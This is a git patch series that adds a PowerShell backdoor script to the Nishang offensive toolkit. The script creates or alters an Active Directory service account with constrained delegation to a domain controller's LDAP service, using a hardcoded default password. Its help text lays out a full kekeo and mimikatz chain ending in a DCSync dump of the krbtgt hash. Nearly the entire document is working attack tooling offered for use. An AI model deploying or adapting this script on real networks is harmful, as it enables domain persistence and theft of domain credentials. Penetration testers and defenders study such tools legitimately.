From d4e37c7cbb7471e2260460b5186e1cee00b4dcb6 Mon Sep 17 00:00:00 2001 From: Dliv3 Date: Mon, 5 Nov 2018 12:24:31 +0800 Subject: [PATCH 1/3] Added ConstrainedDelegation-Backdoor --- Backdoors/ConstrainedDelegation-Backdoor.ps1 | 106 +++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 Backdoors/ConstrainedDelegation-Backdoor.ps1 diff --git a/Backdoors/ConstrainedDelegation-Backdoor.ps1 b/Backdoors/ConstrainedDelegation-Backdoor.ps1 new file mode 100644 index 0000000..02bc800 --- /dev/null +++ b/Backdoors/ConstrainedDelegation-Backdoor.ps1 @@ -0,0 +1,106 @@ +function ConstrainedDelegation-Backdoor +{ +<# +.SYNOPSIS +Nishang Script which could add constrained delegation backdoor service accounts or add constrained delegation backdoor functionality to existing service accounts. + +.DESCRIPTION +This script will add a new service account which is allowed to delegate to some exploitable services, e.g ldap/DC.LAB.LOCAL. +Attackers can use this backdoor service account to get TGS of ldap/DC.LAB.LOCAL through s4u2self and s4u2proxy protocol. + +Attack example: +kekeo.exe "tgt::ask /user:backdoor_svc /domain:lab.local /password:d1ive@Dubhe" exit +kekeo.exe "tgs::s4u /tgt:TGT_backdoor_svc@LAB.LOCAL_krbtgt~lab.local@LAB.LOCAL.kirbi /user:Administrator@lab.local /service:ldap/DC.lab.local" exit +mimikatz.exe "kerberos::ptt TGS_Administrator@lab.local@LAB.LOCAL_ldap~DC2.lab.local@LAB.LOCAL.kirbi" exit +mimikatz.exe "lsadump::dcsync /user:krbtgt /domain:lab.local" exit + +This script needs to be executed from a shell with domain administrator privileges. + +.PARAMETER Name +Service account name + +.PARAMETER SamAccountName +Service sam account name + +.PARAMETER Password +Password of the backdoor service account + +.PARAMETER DomainName +Current domain name + +.PARAMETER ServicePrincipalName +Backdoor service principal name + +.PARAMETER AllowedToDelegateTo +Principle Name of the service which the backdoor service account is allowed to delegate to + +.EXAMPLE +PS > ConstrainedDelegation-Backdoor -SamAccountName backdoor -Password d1ive@Dubhe -DomainName lab.local -AllowedToDelegateTo ldap/DC.lab.local +Use above command to create a new backdoor service account named "backdoor" + +.EXAMPLE +PS > ConstrainedDelegation-Backdoor -SamAccountName iis_svc -DomainName lab.local -AllowedToDelegateTo ldap/DC.lab.local +Use above command to add backdoor functionality to the iis_svc service account. +It should be noted that the attacker needs to know the password of iis_svc. + +.LINK +https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/ +#> + + [CmdletBinding()] Param( + [Parameter(Position = 0, Mandatory = $False)] + [String] + $Name, + + [Parameter(Position = 1, Mandatory = $True)] + [String] + $SamAccountName, + + [Parameter(Position = 2, Mandatory = $False)] + [String] + $UserPrincipalName, + + [Parameter(Position = 3, Mandatory = $False)] + [String] + $Password, + + [Parameter(Position = 4, Mandatory = $True)] + [String] + $DomainName, + + [Parameter(Position = 5, Mandatory = $False)] + [String] + $ServicePrincipalName, + + [Parameter(Position = 6, Mandatory = $True)] + [String] + $AllowedToDelegateTo + ) + + if (!$Name) { + $Name = $SamAccountName + } + + if (!$UserPrincipalName) { + $UserPrincipalName = $SamAccountName + "@" + $DomainName + } + + if (!$ServicePrincipalName) { + $ServicePrincipalName = $SamAccountName + "/" + $DomainName + } + + if (!$Password) { + $Password = "d1ive@Dubhe" + } + + Try { + $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo" + Write-Host "SamAccountName '$SamAccountName' already exists. Add 'msDS-AllowedToDelegateTo $AllowedToDelegateTo' to '$SamAccountName'." + } Catch [Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException] { + New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$SPN" -AccountPassword (convertto-securestring "$Password" -asplaintext -force) -PasswordNeverExpires $True -PassThru | Enable-ADAccount + $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo" + } + Set-ADObject $user -Add @{ "msDS-AllowedToDelegateTo" = @( "$AllowedToDelegateTo" ) } + Set-ADAccountControl $user -TrustedToAuthForDelegation $true +} + From 421057eea9703de4526113b8d69ababeb7747fda Mon Sep 17 00:00:00 2001 From: Dliv3 Date: Mon, 12 Nov 2018 17:22:40 +0800 Subject: [PATCH 2/3] Added ConstrainedDelegation-Backdoor --- Backdoors/ConstrainedDelegation-Backdoor.ps1 | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Backdoors/ConstrainedDelegation-Backdoor.ps1 b/Backdoors/ConstrainedDelegation-Backdoor.ps1 index 02bc800..0d8ee0d 100644 --- a/Backdoors/ConstrainedDelegation-Backdoor.ps1 +++ b/Backdoors/ConstrainedDelegation-Backdoor.ps1 @@ -46,7 +46,11 @@ It should be noted that the attacker needs to know the password of iis_svc. .LINK https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/ #> - + # If you do not have AD module, you can refer to the following link. + # https://github.com/samratashok/ADModule + + #Requires -Modules ActiveDirectory + [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $False)] [String] From e8607d11ee91a9265bd0b7c61129fb47d5f7e569 Mon Sep 17 00:00:00 2001 From: Dliv3 Date: Mon, 12 Nov 2018 21:57:41 +0800 Subject: [PATCH 3/3] Bug Fix in ConstrainedDelegation-Backdoor --- Backdoors/ConstrainedDelegation-Backdoor.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Backdoors/ConstrainedDelegation-Backdoor.ps1 b/Backdoors/ConstrainedDelegation-Backdoor.ps1 index 0d8ee0d..e9a07f1 100644 --- a/Backdoors/ConstrainedDelegation-Backdoor.ps1 +++ b/Backdoors/ConstrainedDelegation-Backdoor.ps1 @@ -101,7 +101,7 @@ https://labs.mwrinfosecurity.com/blog/trust-years-to-earn-seconds-to-break/ $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo" Write-Host "SamAccountName '$SamAccountName' already exists. Add 'msDS-AllowedToDelegateTo $AllowedToDelegateTo' to '$SamAccountName'." } Catch [Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException] { - New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$SPN" -AccountPassword (convertto-securestring "$Password" -asplaintext -force) -PasswordNeverExpires $True -PassThru | Enable-ADAccount + New-ADUser -Name "$Name" -SamAccountName $SamAccountName -UserPrincipalName $UserPrincipalName -ServicePrincipalNames "$ServicePrincipalName" -AccountPassword (convertto-securestring "$Password" -asplaintext -force) -PasswordNeverExpires $True -PassThru | Enable-ADAccount $user = Get-ADUser $SamAccountName -Properties "msDS-AllowedToDelegateTo" } Set-ADObject $user -Add @{ "msDS-AllowedToDelegateTo" = @( "$AllowedToDelegateTo" ) }